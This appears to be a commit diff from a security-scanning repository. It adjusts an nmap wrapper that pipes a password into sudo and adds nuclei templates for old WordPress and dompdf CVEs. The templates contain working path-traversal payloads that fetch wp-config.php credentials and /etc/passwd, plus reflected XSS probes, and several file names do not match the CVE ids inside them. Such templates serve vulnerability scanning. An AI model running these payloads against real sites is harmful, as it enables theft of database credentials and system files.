up PoCs 2022-08-25

Author: hktalent

config/doNmapScan.sh

@@ -5,9 +5,9 @@ function doMasScan {
         # -F --top-ports=65535
         #  -p 80,443
         # -sV 得到的指纹信息更准，但是更慢
-        echo $PPSSWWDD|sudo -S nmap -F -sV --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4  -iL $1 -oX $2
+        echo $PPSSWWDD|sudo -S nmap -F  --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4  -iL $1 -oX $2
     else
-        echo $PPSSWWDD|sudo -S nmap -F -sV --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4  $1 -oX $2
+        echo $PPSSWWDD|sudo -S nmap -F --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4  $1 -oX $2
     fi
 }
 doMasScan $1 $2

config/nuclei-templates/51pwn/pay001.yaml

@@ -0,0 +1,39 @@
+id: CVE-2008-1059
+
+info:
+  name: WordPress Sniplets 1.1.2 - Local File Inclusion
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/5194
+    - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
+    - http://secunia.com/advisories/29099
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2008-1061
+    cwe-id: CWE-22
+  tags: cve,cve2008,wordpress,wp-plugin,lfi,wp,sniplets
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/29

config/nuclei-templates/cves/2008/CVE-2008-1059.yaml

@@ -0,0 +1,35 @@
+id: CVE-2008-1061
+
+info:
+  name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: |
+    Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
+  reference:
+    - https://www.exploit-db.com/exploits/5194
+    - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
+    - http://secunia.com/advisories/29099
+  tags: cve,cve2008,xss,wordpress,wp-plugin,wp,sniplets
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2008/CVE-2008-1061.yaml

@@ -1,33 +1,45 @@
 id: CVE-2014-2383
 
 info:
-  name: Arbitrary file read in dompdf < v0.6.0
-  author: 0x_Akoko
+  name: Dompdf < v0.6.0 - Local File Inclusion
+  author: 0x_Akoko,akincibor,ritikchaddha
   severity: high
-  description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
+  description: |
+    A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
     - https://www.exploit-db.com/exploits/33004
     - http://seclists.org/fulldisclosure/2014/Apr/258
     - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
+    - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
   classification:
     cve-id: CVE-2014-2383
   metadata:
-    unix-payload: /dompdf.php?input_file=/etc/passwd
-    win-payload: /dompdf.php?input_file=C:/windows/win.ini
-  tags: cve,cve2014,dompdf,lfi
+    verified: "true"
+  tags: cve,cve2014,dompdf,lfi,wordpress,wp-plugin,wp
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
-      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
+      - "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
 
     stop-at-first-match: true
     matchers-condition: and
     matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
       - type: word
         words:
           - "application/pdf"
@@ -39,4 +51,4 @@ requests:
         status:
           - 200
 
-# Enhanced by mp on 2022/02/24
+# Enhanced by mp on 2022/08/06

config/nuclei-templates/cves/2014/CVE-2014-2383.yaml

@@ -0,0 +1,39 @@
+id: CVE-2014-9119
+
+info:
+  name: WordPress DB Backup <=4.5 - Local File Inclusion
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+  reference:
+    - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
+    - https://www.exploit-db.com/exploits/35378
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-9119
+    - https://wpvulndb.com/vulnerabilities/7726
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2014-9119
+    cwe-id: CWE-22
+  tags: cve,cve2014,wordpress,wp-plugin,lfi,wp,backup
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/05

config/nuclei-templates/cves/2014/CVE-2014-9119.yaml

@@ -0,0 +1,35 @@
+id: CVE-2015-1000005
+
+info:
+  name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
+  reference:
+    - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005
+    - http://www.vapidlabs.com/advisory.php?v=142
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-1000005
+    cwe-id: CWE-22
+  tags: cve,cve2015,wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/04/21

config/nuclei-templates/cves/2015/CVE-2015-1000005.yaml

@@ -0,0 +1,36 @@
+id: CVE-2015-1000010
+
+info:
+  name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php  because no checks are made to authenticate users or sanitize input when determining file location.
+  reference:
+    - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
+    - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
+    - http://www.vapidlabs.com/advisory.php?v=147
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-1000010
+    cwe-id: CWE-22
+  tags: cve,cve2015,wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/29

config/nuclei-templates/cves/2015/CVE-2015-1000010.yaml

@@ -0,0 +1,44 @@
+id: CVE-2015-1579
+
+info:
+  name: WordPress Slider Revolution - Local File Disclosure
+  author: pussycat0x
+  severity: high
+  description: |
+    Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
+  reference:
+    - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
+    - https://cxsecurity.com/issue/WLB-2021090129
+    - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1579
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-1579
+    cwe-id: CWE-22
+  metadata:
+    google-dork: inurl:/wp-content/plugins/revslider
+  tags: cve,cve2015,wordpress,wp-plugin,lfi,revslider,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+      - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'DB_NAME'"
+          - "'DB_PASSWORD'"
+          - "'DB_USER'"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/29

config/nuclei-templates/cves/2015/CVE-2015-1579.yaml

@@ -0,0 +1,35 @@
+id: CVE-2015-4127
+
+info:
+  name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: |
+    Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
+  reference:
+    - https://www.exploit-db.com/exploits/37112
+    - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
+    - https://wordpress.org/plugins/church-admin/changelog/
+  tags: cve,cve2015,wordpress,xss,wp-plugin,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200